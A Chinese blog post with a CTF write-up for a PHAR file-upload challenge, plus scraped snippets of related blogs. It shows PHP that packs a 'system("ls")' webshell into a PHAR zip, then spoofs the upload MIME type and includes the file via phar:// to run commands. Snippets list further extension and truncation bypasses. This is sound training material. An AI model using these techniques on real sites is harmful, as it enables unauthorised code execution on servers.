文件上传-PHAR

原创 于 2025-02-27 22:28:35 发布 · 214 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#docker #php #容器

[题目信息]:

题目名称题目难度
文件上传-PHAR1

[题目考点]:

文件上传与PHAR协议的使用

[Flag格式]:

SangFor{gOiJbWBSHc3vnj-B0FDVvde5cQ_KScTp}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

docker-compose up -d

端口:11014

[题目writeup]:

1、实验主页

2、题解分析

首先右键查看网页源代码,发现有代码提示。

这里去包含了通过GET方式传递的 mod 和 action 字符串拼接后的文件。

这里可以使用 phar 协议来包含文件。将以下内容写入到1文件中。

<?php

$p = new PharData(dirname(FILE).’/phartest.zip’, 0,‘phartest’,Phar::ZIP) ;

$x=file_get_contents(’./1’);

$p->addFromString(‘1’, $x);

?>

1文件中的内容为

<?php system(“ls”);?>

运行 1.php 。即可得到 phartest.zip 。将 phartest.zip 上传,并且通过 burp 抓包,将文件类型改为image/jpeg然后上传即可。

访问文件路径执行1文件中的php代码

稍作修改命令即可获取flag

[极客大挑战 2020]Roamphp2-Myblog - 伪协议+文件上传+(LFI&ZIP)||(LFI&Phar)【***】
oZuoShen123的博客
10-09 571
1、点击login,进入登录界面,用户名在首页提示了是longlone,密码未知,无法登录。 2、点击其他地方,发现没有什么线索,唯一有的只有page这个参数。 3、题目描述:Do you know the PHP pseudo-protocol? —— 意思就是跟伪协议有关系 关键代码:
文件上传漏洞
4ct10n
11-23 2972
0x00 文件上传漏洞原理 0x01 本地测试上传漏洞 0x1 最简单的木马 0x2 文件包含漏洞 直接利用没有文件包含的情况 phar伪协议利用 phpinput伪协议利用 图片木马 0x02 文件上传题目 0x00 00截断 0x1 兵者多鬼 自从接触网络安全也有一段时间了,自己根据自己的经验总结一下文件上传漏洞的方法及本地测试结果,希望能够帮助到大家,同时也是一个很好的学习记录过程。 0x
Phar 文件上传以及反序列化
十一.的博客
11-13 916
第2步:把生成的exp.phar,改成exp.zip(题目白名单过滤)然后通过文件上传功能点上传。2.phar://伪协议 是php解压缩报的一个函数,不管后缀是什么,都会当做压缩包来解压。第3步:访问 图片路径/test.php (由于题目会加php后缀,则文件包含的时候不用加)首先生成上传phar文件(改后缀为jpg绕过检测)(1)不涉及反序列化,文件上传+文件包含 上传。首先构造phar文件 ,然后上传。5.关闭readonly模式。1、能将phar文件上传。将 phar 文件使用。
phar反序列化+文件上传与例题讲解
2301_79708753的博客
01-26 1784
web笔记相关于phar反序列化+文件上传与例题讲解,欢迎各位指正
phar文件上传的骚姿势(绕过phar、_HALT)
qq_62046696的博客
10-07 2351
前面也讲过一次phar文件上传的东西,但是那都是过滤比较低,仅仅过滤了后缀。知道今天看到了一篇好的文章。
[SWPUCTF 2018]SimplePHP phar漏洞及其文件上传
qq_54929891的博客
03-27 3363
在查看文件这个页面发现一个可疑参数file,试试能不能读取源代码 根据include包含来将各个文件源代码都提取出来,最重要的是class.php <?php class C1e4r { public $test; public $str; public function __destruct() { $this->test = $this->str; echo $this->test; } } ..
学习phar
夜风的博客
04-12 1078
Phar文件是一种打包格式,将PHP代码文件和其他资源放入一个文件中来实现应用程序和库的分发。Phar可利用是因为phar以序列化的形式存储用户自定义的meta-data,而以流的形式打开的时候,会自动反序列化。
文件上传phar
最新发布
03-25
$phar->addFromString("xilzy.txt", "xilzy"); // 停止缓冲并将更改保存至磁盘 $phar->stopBuffering(); echo "成功生成 phar 文件"; ?> ``` #### 2. 利用 PHAR 协议加载文件 PHP 提供了一种特殊的伪协议——Phar...
phpphar打包一个项目成一个文件 - 笔记搬迁9
热门推荐
stone
06-13 1万+
phar.php &lt;?php /** * 目的 :将PHP框架项目,打包成一个 .phar 文件 * 常用 :这个打包,一般是用PHP语言来做 linux 系统软件的,如composer.phar * * * 方法: * * 压缩 test_phar 目录下的(php,可选)文件 * * 1、将 php.ini 的 `;phar.readonly = On` 改...
composer.phar
02-14
composer官网下载太慢,上传一个composer.phar 2、将composer.phar文件移动到bin目录以便全局使用composer命令 # mv composer.phar /usr/local/bin/composer # chmod +x /usr/local/bin/composer 3、切换...
NSSCTF-Web题目21(文件上传-phar协议、RCE-空格绕过)
weixin_54055099的博客
07-02 911
phar伪协议、RCE-空格绕过
[SWPUCTF 2018]SimplePHPPhar:// + 文件上传
D.MIND 的博客
04-24 2273
文章目录Phar:// 协议进行反序列化构造POP链生成phar总结: 一道不算难的反序列化+文件上传题目,但自己在构造POP链时还是愣了好久,本菜鸡名副其实了 首先是在查找文件处,URL明显是值得怀疑的file.php?file= 这按照惯例得试试能不能把一些文件读出来 一共是这些:index.php、base.php、file.php、upload_file.php、class.php upload_file.php值得关注就是这个限制了,只允许图片 在file.php中就有对象的生成 //file.
文件上传-绕过MIE-Type验证
qq_25899635的博客
05-19 256
qq
文件上传Phar反序列化的摩擦
Aiwin的博客
11-03 2556
文件上传Phar反序列化的摩擦和例题
phar的认识与使用
Leroi_Liu的博客
01-11 7860
对于Web应用的开发,如果你没用使用正确的工具,那开发过程可能会变得困难和痛苦。如果你之前开发过Java程序,我相信你肯定知道Jar文件(Jar是Java ARchive的缩写)。一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里,使得部署过程十分简单。 PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,...
[CISCN2019 华北赛区 Day1 Web1]Dropbox 1
plant1234的博客
10-01 1074
phar文件的表示,类似于gif文件的GIF89a,以 xxx为固定形式,前面内容可以变,点必须以__HALT__COMPILER();?>结尾。该部分是phar文件中被压缩的文件的一些信息,其中meta-data部分的信息会被序列化,即执行serialize()函数,而phar://就相当于对这部分的内容进行反序列化,此处也正是漏洞点所在。这部分存储的是文件的内容,在没有其它特殊要求的情况下,这里面的内容不做约束。数字签名。放在最末。1、phar文件可上传。
利用 phar 伪协议进行文件包含
m0_73612768的博客
11-03 615
在这里前后端都会校验,而且都采用白名单机制,并且 PHP 版本高于 5.2.4 ,什么 %00截断,0x00截断都用不了
php文件上传+文件包含(phar伪协议)
WFC1006848997的博客
11-22 6505
test.bugku-web-upload—文件上传与文件包含组合 右键查看源码发现 继续查看源码,提示参数是file,还有一个upload.php 跟进upload.php,是个上传界面 那就可以猜测出是 文件上传与文件包含的组合,所以直接先使用伪协议查看源码,使用的是php://filter协议 php://filter/convert.base64-encode/resource= 首先读取include.php的源码 发现后缀多了一个.php,所以就不加.php了 base64解码 &l
文件上传/文件包含
qq_35533398的博客
09-08 970
文件上传 1、前端验证 如:检测 . 后的后缀名 绕过方式:burp进行抓包修改后缀 2、后端验证 (1)获取文件名,过滤php后缀 绕过方式1:.php4 .php5 .phtml php2, php3, php4, php5, phps, pht, phtm, phtml 绕过方式2:apache解析漏洞,从后向前知道可以识别的后缀,如 aaa.php.lyc (2)对文件MIME类型进行判断 比如:if ($_FILES["file"]["type"] != "image/jpeg
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值